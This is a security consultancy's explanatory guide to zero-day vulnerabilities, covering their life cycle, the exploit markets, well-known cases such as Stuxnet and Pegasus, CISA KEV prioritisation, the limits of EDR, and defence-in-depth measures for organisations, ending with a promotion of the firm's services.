A zero-day vulnerability is a software flaw unknown to the vendor, or known but still without an available patch, that is already being exploited or can be exploited at any moment without the victim having a standard way to defend. The "day zero" label refers exactly to that: the day on which the organisation has zero days of official protection. There is no update, there is no updated antivirus signature, there is no published IDS rule. For the defender, the only defence window is the prior generic controls, not the specific response to the concrete flaw.
This guide explains what falls within the zero-day concept, the full life cycle, the difference with n-day, the real market (official bug bounty, gray market and black market), who buys and what for, representative public cases, the role of the CISA KEV catalogue, why a modern EDR does not guarantee detection, the defences that work against unknown flaws, the disclosure ethics debate and reasonable prioritisation for companies that are not nation-state targets.
Key takeaways on zero-day
- Zero-day is a vulnerability with no public patch available, exploited or exploitable at any moment.
- The life cycle has seven phases: discovery, exploitation, vendor notification, patch development, disclosure, rollout and residual exploitation until the last patched system.
- There is an official market (bug bounty), a gray market (Zerodium, Crowdfense) with public six and seven figure prices, and a black market in closed forums.
- CISA KEV is the operational list of vulnerabilities with confirmed exploitation and any organisation should treat it as priority above isolated CVSS.
- EDR does not always detect zero-day because payload and technique are new; real defence is depth in layers, not a single product.
What a zero-day vulnerability actually is
A zero-day vulnerability meets at least one of these conditions:
- The vendor does not know about the flaw. The finder keeps it private or is exploiting it actively without notifying.
- The vendor knows but has not published a patch yet. The window between notification and public patch is operational zero-day from the defender's point of view.
- A patch exists but details are not public and it is being used in the wild before most organisations have updated. Some sources consider this zero-day broadly, others talk about immediate n-day.
What distinguishes a zero-day from any other vulnerability: there is no public CVE advisory, there is no specific signature in EDR, IDS or WAF, there is no patch to apply. The only mitigations are configuration, disabling the vulnerable component or generic compensating controls.
Zero-day life cycle
The full life cycle goes through seven phases.
Discovery. Someone finds the flaw: academic researcher, bug bounty team, independent hunter, state offensive team or criminal attacker. The motivation and destination define the next phase.
Exploitation in the wild. If whoever finds it is offensive, they start using it in real operations. Targets are usually limited at first to avoid burning the exploit.
Vendor notification. When a responsible researcher or detection team identifies the flaw, they notify the vendor through a responsible disclosure channel. The vendor response clock starts.
Patch development. The vendor reproduces the flaw, designs the fix and tests it to avoid regressions. Typical timelines range from days for mature vendors to months for complex components.
Disclosure. Coordinated publication of the patch, technical advisory and CVE. Some researchers publish proof of concept a few days later to encourage urgent patching.
Patch rollout. Organisations receive the patch and start the internal cycle of testing, maintenance window and deployment. In critical environments it takes weeks or months.
Ongoing exploitation. As long as an unpatched system accessible to the attacker remains, the flaw is still exploitable. EternalBlue (2017), Log4Shell (2021) or ProxyShell (2021) still appear in recent incident reports.
Zero-day vs n-day vs known vulnerability
| Concept | Patch available | Public details | Operational risk |
|---|---|---|---|
| Zero-day | No | No, or only among attackers | Maximum, no specific defence possible |
| Recent n-day | Yes | Yes, with or without public exploit | High if not patched in a reasonable window |
| Old n-day | Yes | Yes, included in tools | Medium, depends on exposure and time since publication |
| Known vulnerability without exploitation | Yes | Yes, no observed criminal activity | Low, standard maintenance priority |
The practical difference between zero-day and recent n-day is smaller than it looks for an organisation with slow patch management. An opportunistic attacker exploiting a three-week-old n-day against an unpatched system has the same effect as a sophisticated actor with an exclusive zero-day: control of the asset.
Zero-day market
The real zero-day market splits across three channels with different clients, prices and rules.
Official bug bounty
Official programmes pay researchers for reporting flaws directly to the vendor:
- HackerOne and Bugcrowd. Multi-client platforms with thousands of active programmes (Shopify, GitHub, Uber and similar).
- Apple Security Research Device Program. iOS research with rewards from five to seven figures depending on severity and exclusivity.
- Microsoft Bug Bounty Programs. Family of programmes by product (Azure, Windows, M365, Edge) with public tables.
- Google Vulnerability Rewards Program. Covers Android, Chrome, Google infrastructure and dependent open source.
Official payments are below the gray market but offer legality, public reputation and long-term relationship with the vendor.
Gray market
Legal companies that buy zero-days and sell them mostly to governments and agencies. Their activity generates constant ethical debate:
- Zerodium. Pioneer in publishing prices. Public table with six and seven figure payments for full exploit chains in iOS, Android, Chrome, Safari, Edge.
- Crowdfense. Company based in the Emirates that competes with Zerodium with similar tables.
- Trenchant (formerly L3Harris Trenchant). Offensive capabilities for allied government clients.
Publicly reported prices for persistent iOS chains have reached the million-dollar range depending on vendor and exclusivity. Chrome RCE with sandbox escape moves in the hundreds of thousands.
Black market
Closed forums in clearnet and dark web where exploits are bought and sold without ethical or legal filters. Clients: ransomware operators, APT groups not aligned with legal gray buyers, initial access brokers. Prices below gray market because of higher legal and quality risk.
Who buys zero-days and what for
Buyers group in three categories.
Nation-state offensive. Intelligence and defence agencies of world and regional powers. The exploits sustain intelligence operations, surveillance of defined targets and offensive capability in cyber warfare. The distinction between legitimate use against terrorism or crime and abuse against journalists, activists and opposition is one of the open debates in the sector.
Defensive vendors and security providers. Some buy zero-days to research and improve detection in their products. Initiatives like Trend Micro's Zero Day Initiative buy vulnerabilities, report them to the vendor and publish coordinated advisories.
Academic and private researchers. Researchers with official bug bounty as destination or consultancies developing internal capabilities for advanced pentesting and Red Team. They do not buy exploits from third parties as a rule, they discover them themselves.
Representative public cases
Stuxnet (2010). Worm attributed to a joint operation by the United States and Israel against Iranian nuclear enrichment infrastructure. It used four Windows zero-days simultaneously, an exceptional fact that evidenced the level of investment behind it. It is the founding case of the zero-day-as-state-weapon era.
NSO Group's Pegasus. Spyware with zero-click iMessage chains documented by Citizen Lab and Amnesty Tech. Publicly identified cases cover journalists, activists and government members. The FORCEDENTRY and BLASTPASS chains are examples analysed in depth by Project Zero.
Annual Pwn2Own. Contest sponsored by Zero Day Initiative where researchers demonstrate zero-day exploits against browsers, operating systems, vehicles and IoT devices. Immediate vendor report under ZDI coordinated disclosure.
Chrome v8 series. Chrome's JavaScript virtual machine has been a recurring target of zero-days exploited in the wild. Google publishes bulletins confirming active exploitation against specific engine flaws.
CISA KEV catalogue
The Known Exploited Vulnerabilities catalogue maintained by CISA lists vulnerabilities with confirmed in-the-wild exploitation. Inclusion forces federal civilian agencies to patch within deadlines set by directive BOD 22-01.
For a private organisation, KEV is an operational reference for three reasons: it selects real risk and not theoretical (a CVE with CVSS 9.8 without observed exploitation is less urgent than a CVSS 7.5 included in KEV), provides an indicative patching deadline and offers continuous free coverage.
Combined with EPSS (statistical exploitation probability), KEV allows patching to be prioritised quantitatively above isolated CVSS.
Why EDR does not always detect zero-day
A modern EDR detects threats through a combination of signatures, heuristics, behaviour and, in recent suites, machine learning models. Against a zero-day it can fail for several reasons.
- New payload. The specific binary, script or byte string is not in threat intelligence bases. Signatures do not trigger.
- New technique. The sequence of system calls or memory operations does not match known behaviour patterns. Heuristics do not raise an alert.
- Kernel-level and privilege escalation. Exploits living in the kernel or exploiting signed drivers have the capacity to manipulate the EDR itself before generating useful telemetry.
- Living off the land. If the exploit uses only legitimate system binaries after achieving execution, post-exploit activity can look like normal administration.
- Speed. Some advanced chains compromise the system and exfiltrate data within minutes. Even if the EDR detects something late, the damage is already done.
The operational conclusion is not that EDR is useless, but that it is not a single sufficient defence against advanced actors with zero-day capability. More detail in EDR vs XDR vs MDR and EDR evasion with LLM.
Defences against unknown zero-day
If the attacker uses a flaw nobody knows, defence is layered depth assuming each layer can fail.
Virtual patching via WAF and IPS. Generic rules that block anomalous traffic patterns associated with exploit families, not specific CVEs. Useful to gain time while the official patch arrives. More context in what is a WAF.
Defence in depth and assume breach. No individual control decides the outcome. If the attacker crosses the first layer, the second contains them, the third detects them, the fourth limits the damage.
Behaviour-based EDR and UEBA. Anomalous behaviour analysis for users and endpoints, not only signatures. Detects secondary indicators even when the initial payload is invisible.
Application allowlisting. Only authorised software runs. AppLocker, Windows Defender Application Control or per-application sandboxing drastically reduce the useful surface of an exploit.
Least privilege. If the compromised user or service does not have administrative permissions, the blast radius is limited while it does not chain with local escalation.
Network segmentation. Lateral movement is difficult when segments are isolated with strict policies and real zero trust between zones.
Proactive threat hunting. Active search for indicators in telemetry without waiting for alerts. More in what is threat hunting.
Monitoring of CISA KEV and high EPSS. Patching priority based on real exploitation and statistical probability, not only CVSS.
Disclosure ethics
Google's Project Zero publishes vulnerabilities 90 days after notifying the vendor, with a 14-day extension if the patch is close. The deadline is aggressive but it has helped professionalise the response of large manufacturers.
Classic responsible disclosure does not set an automatic deadline. Researcher and vendor negotiate the publication date based on patch complexity.
Immediate full disclosure is a minority view today. Publishing a working exploit without an available patch is considered irresponsible except in exceptional cases.
Zero Day Initiative acts as intermediary: pays the researcher, reports to the vendor, sets a deadline and publishes a coordinated advisory.
For companies that are not nation-state targets
Most organisations, including large companies not strategic for state intelligence, are not realistic targets for actors with exclusive zero-day capability. Reasonable priority:
- Agile patching of n-days in CISA KEV. Most exploit incidents use vulnerabilities patched weeks or months in advance.
- Basic hardening. Secure default configuration, MFA, segmentation, least privilege.
- Functional detection and response. EDR on every endpoint, with a SOC (internal or MDR) that responds in hours.
- Immutable backups and a tested response plan.
Obsessing over exclusive zero-days while critical n-days have gone unpatched for months is bad investment. The exception is sectors targeted by advanced operations: defence, critical infrastructure, telecommunications, systemic finance, politics and dissidence.
Frequently asked questions
Is an SMB a realistic target for zero-day?
Almost never for exclusive zero-day. Actors with that capability reserve the exploit for high-value targets. An SMB is a target for recent unpatched n-day or for opportunistic ransomware campaigns that exploit vulnerabilities published weeks ago. That is the real priority.
Is buying zero-day illegal?
It depends on jurisdiction and buyer. Buying in a regulated gray market (Zerodium, Crowdfense) from a government is legal in many countries. Buying in the black market to use against third parties without authorisation is a crime in any jurisdiction with a modern penal code. For a private Spanish company, the legal path is in-house bug bounty or hiring an internal or external Red Team with authorised scope.
Is virtual patching really effective?
It is partial defence useful to gain time. It works well for flaws in web applications behind a modern WAF, with rules covering the exploit family. It does not replace the real patch. An organisation should not operate indefinitely with virtual patch as the only measure, but using the days-to-weeks window until the official patch is justified.
Can Pegasus be on my smartphone?
For private citizens not targeted by state intelligence, the statistical probability is very low. For journalists covering sensitive topics, activists, political opposition, government members or human rights defenders, the probability rises and there are forensic indicators published by Citizen Lab and Amnesty Tech that help verify. The Mobile Verification Toolkit is the reference tool for analysis.
Does EDR machine learning detect zero-day?
Sometimes. The models detect anomalous behaviours similar to known families. They can trigger on new techniques that share patterns with historical techniques. They do not reliably detect sophisticated chains designed specifically to evade them. The ML layer is complement, not guarantee.
Is CISA KEV better than CVSS for prioritising?
For operational prioritisation, yes. CVSS measures theoretical severity of the flaw, KEV confirms real observed exploitation. A vulnerability with CVSS 7.5 included in KEV is a higher priority than one with CVSS 9.8 without documented exploitation. The recommended combination is KEV + EPSS + asset context (exposure, business criticality).
Related resources
- What is a CVE: standard identifier on which advisories are published and the vulnerability cycle is tracked.
- What is an exploit: code or technique that turns a vulnerability, zero-day or n-day, into operational effect.
- What is EDR: endpoint detection and response, a fundamental layer but not sufficient against advanced zero-day.
- What is threat hunting: active search for indicators that helps discover zero-day activity before official signatures.
- EDR vs XDR vs MDR: comparison of managed detection and response models.
- EDR evasion with LLM: how generative models are changing the economics of evasion and what it implies for defence.
Vulnerability management programme with Secra
At Secra we work with clients on three complementary fronts to zero-day risk. First, design and review of vulnerability management programmes with prioritisation by CISA KEV and EPSS, real metrics of time to patch and virtual patching policies coordinated with the operations team. Second, Red Team exercises that empirically validate whether defensive controls detect exploitation of recent n-days and patterns equivalent to zero-day through living off the land techniques. Third, consulting on defence-in-depth architecture for sectors with high-risk profile: segmentation, least privilege, application allowlisting and response model. If your organisation wants to measure its real exposure to actively exploited vulnerabilities, write to us through contact or check our Red Team service.
About the author
Secra Solutions team
Ethical hackers with OSCP, OSEP, OSWE, CRTO, CRTL and CARTE certifications, 7+ years of experience in offensive cybersecurity, and authors of CVE-2025-40652 and CVE-2023-3512.